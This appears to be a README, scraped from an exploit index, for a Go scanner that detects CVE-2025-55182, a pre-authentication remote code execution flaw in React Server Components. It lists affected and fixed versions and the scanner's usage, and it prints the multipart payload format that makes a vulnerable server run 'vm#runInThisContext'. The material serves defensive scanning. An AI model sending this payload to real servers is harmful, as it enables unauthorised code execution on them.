Share
## https://sploitus.com/exploit?id=7730813A-320D-5555-A85C-FE2367117D3D
# CVE-2025-55182 Scanner
Fast, concurrent vulnerability scanner for **CVE-2025-55182** - a critical (CVSS 10.0) pre-authentication Remote Code Execution vulnerability in React Server Components.
## Vulnerability Overview
**CVE-2025-55182** allows unauthenticated remote code execution by exploiting a flaw in how React decodes payloads sent to Server Function endpoints.
| | |
|---|---|
| **CVE ID** | [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) |
| **CVSS Score** | 10.0 CRITICAL |
| **Type** | Pre-auth Remote Code Execution |
| **Discovered by** | [Lachlan Davidson](https://github.com/lachlan2k) |
| **Disclosed** | December 3, 2025 |
### Affected Packages
- `react-server-dom-webpack` (19.0.0, 19.1.0, 19.1.1, 19.2.0)
- `react-server-dom-parcel` (19.0.0, 19.1.0, 19.1.1, 19.2.0)
- `react-server-dom-turbopack` (19.0.0, 19.1.0, 19.1.1, 19.2.0)
### Affected Frameworks
- **Next.js** - All versions using vulnerable React packages
- **React Router** - RSC APIs
- **Waku**
- **Parcel RSC** (`@parcel/rsc`)
- **Vite RSC** (`@vitejs/plugin-rsc`)
- **Redwood SDK** (`rwsdk`)
### Fixed Versions
- React: 19.0.1, 19.1.2, 19.2.1
- Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
**References:**
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Meta Security Advisory](https://www.facebook.com/security/advisories/cve-2025-55182)
---
## Quick Start
```bash
go build -o scanner
./scanner http://example.com
./scanner -f targets.txt -o results.json
```
## Usage
```
scanner [options] ...
Options:
-t, --target Target URL (repeatable)
-f, --file File with target URLs (one per line)
-e, --endpoint Custom endpoint to test (repeatable)
-o, --output Save results to JSON file
--vulnerable-only Only save vulnerable targets in output
--timeout Request timeout (default: 10)
--concurrency Concurrent requests per target (default: 10)
--target-concurrency Targets to scan in parallel (default: 5)
--depth Crawl depth for endpoint discovery (default: 2)
--no-crawl Skip endpoint discovery crawling
-q, --quiet Quiet mode - minimal output
-v, --verbose Verbose output
Authentication:
--basic-auth HTTP Basic Authentication
--bearer Bearer token for Authorization header
-c, --cookie Cookie to include (repeatable)
-H, --header Custom header (repeatable)
```
## Examples
```bash
# Basic scan
./scanner http://localhost:3002
# Bulk scan with output file
./scanner -f targets.txt -o results.json --no-crawl
# Fast parallel scanning
./scanner -f targets.txt --target-concurrency 20 --no-crawl -q
# With authentication
./scanner http://example.com --bearer "eyJhbGciOiJIUzI1NiIs..."
./scanner http://example.com -c "session=abc123" -H "X-API-Key: secret"
```
---
## Testing with Vulnerable Server
A vulnerable test server is included in the `testserver/` directory for validating the scanner. It simulates a Next.js application with a vulnerable RSC Server Action endpoint at `/api/rsc`.
### Option 1: Docker (Recommended)
```bash
cd testserver
docker build -t cve-2025-55182-test .
docker run -p 8888:8888 cve-2025-55182-test
```
### Option 2: Node.js Directly
```bash
cd testserver
node server.js
```
The server will start on `http://localhost:8888`.
### Running the Scanner Against Test Server
```bash
./scanner http://localhost:8888
```
**Expected output:**
```
CVE-2025-55182 Scanner
โโโโโโโโโโโโโโโโโโโโโโ
Targets: 1 | Concurrency: 10 | Timeout: 10s
[1/3] Fingerprinting... Next.js
[2/3] Discovering endpoints... 0 crawled, 26 total
[3/3] Testing endpoints...
๐ด VULNERABLE: http://localhost:8888/api/rsc
โโ vm#runInThisContext (high confidence)
โโ vm.runInThisContext executed: 1+1=2
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
SCAN SUMMARY
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Targets scanned: 1
Vulnerable: 1
RSC detected: 1
โ ๏ธ VULNERABLE TARGETS:
โข http://localhost:8888
โโ http://localhost:8888/api/rsc
```
---
## Safe Probes
The scanner uses **non-destructive** payloads only:
| Probe | Payload | Vulnerable Response |
|-------|---------|---------------------|
| `vm#runInThisContext` | `"1+1"` | Returns `"2"` |
| `fs#existsSync` | `"/tmp/..."` | Returns `true` or `false` |
| `util#constructor` | `[]` | Returns object info |
These probes:
- โ
Do not write files
- โ
Do not execute system commands
- โ
Do not exfiltrate data
- โ
Do not modify server state
---
## Output Format
Results are saved as JSON:
```json
[
{
"target": "http://localhost:3002",
"fingerprint": {
"framework": "Next.js",
"hasRsc": true,
"indicators": ["Next.js detected"]
},
"endpointsTested": 26,
"findings": [
{
"url": "http://localhost:3002/",
"vulnerable": true,
"gadgets": [
{
"name": "vmProbe",
"gadgetId": "vm#runInThisContext",
"confidence": "high",
"evidence": ["vm.runInThisContext executed: 1+1=2"]
}
]
}
],
"vulnerable": true,
"scannedAt": "2025-12-04T12:00:00Z"
}
]
```
---
## Building from Source
```bash
# Build for current platform
go build -o scanner
# Cross-compile for Linux
GOOS=linux GOARCH=amd64 go build -o scanner-linux
# Cross-compile for macOS
GOOS=darwin GOARCH=amd64 go build -o scanner-macos
# Cross-compile for Windows
GOOS=windows GOARCH=amd64 go build -o scanner.exe
```
---
## Technical Details
The vulnerability exists in the `requireModule` function within the React Server DOM packages. When processing Server Action payloads, React unsafely deserializes the `$ACTION_REF` field, allowing attackers to specify arbitrary `module#method` references that the server resolves and executes.
**Payload format:**
```
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["1+1"]}
------Boundary--
```
**Impact:** Full server-side code execution with the privileges of the Node.js process.
---
## Disclaimer
โ ๏ธ This tool is provided for **authorized security testing only**.
- โ
Use on systems you own or have explicit permission to test
- โ Do not use for unauthorized access
- โ Do not deploy the test server in production or expose it to the internet
The authors are not responsible for misuse of this tool.